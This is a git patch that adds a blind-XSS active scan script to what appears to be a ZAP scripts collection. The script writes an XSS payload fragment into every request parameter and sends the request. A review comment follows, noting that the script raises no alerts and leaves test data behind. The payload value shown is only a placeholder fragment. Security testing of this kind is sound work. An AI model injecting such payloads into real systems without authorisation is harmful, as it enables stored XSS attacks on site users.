From 9ea2c59dac0891a967eb4000cf9a9c8326d12a4d Mon Sep 17 00:00:00 2001
From: Khaled Nassar <45688522+knassar702@users.noreply.github.com>
Date: Tue, 24 Aug 2021 10:51:26 -0400
Subject: [PATCH] inject blind xss payloads Add active/bxss.js
Signed-off-by: Khaled Nassar <45688522+knassar702@users.noreply.github.com>
---
 CHANGELOG.md | 1 +
 active/bxss.py | 18 ++++++++++++++++++
 2 files changed, 19 insertions(+)
 create mode 100644 active/bxss.py
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 05a282e3..bb45c32a 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 - variant/CompoundCookies.js - An input vector script that handles splitting of compound cookies (Issue 6582).
 - active/corsair.py > An active scan script to check for CORS related issues.)
 - payloadgenerator/securerandom.js > A fuzzer payload generator script that uses Java's SecureRandom as it's source (related to issue 6892).
+- active/bxss.py > an active scan script for inject blind xss payloads to the parameters
 ## [13] - 2021-10-14
 ### Fixed
diff --git a/active/bxss.py b/active/bxss.py
new file mode 100644
index 00000000..2de1c4da
--- /dev/null
+++ b/active/bxss.py
@@ -0,0 +1,18 @@
+# by: Khaled Nassar @knassar702
+
+# YOUR XSSHUNTER PAYLOAD
+bxss = '">'
+def scanNode(sas, msg):
+ pass
+
+
+def scan(sas, msg, param, value):
+
+ # Copy requests before reusing them
+ msg = msg.cloneRequest();
+
+ # setParam (message, parameterName, newValue)
+ sas.setParam(msg, param, bxss);
+
+ # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+ sas.sendAndReceive(msg, False, False);
\ No newline at end of file
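Review bot: With the value shipped in `bxss = '">'` (as it appears on this page), `scan` in active/bxss.py overwrites every parameter with a two-character fragment that cannot report back, and because the result of `sas.sendAndReceive` is discarded and no alert is raised, such a run is indistinguishable from a clean scan. Guard the top of `scan` so an unconfigured script does nothing, for example `if bxss == '">': return`. Add a module comment stating that this rule raises no ZAP alerts and that findings only appear in the external callback service, so an empty alert list is not evidence that a parameter is safe. The same comment should record that each scanned parameter is overwritten with the payload on the target, which can leave stored test data behind. Minor style: drop the trailing semicolons and end the file with a newline, since the hunk closes with `\ No newline at end of file`.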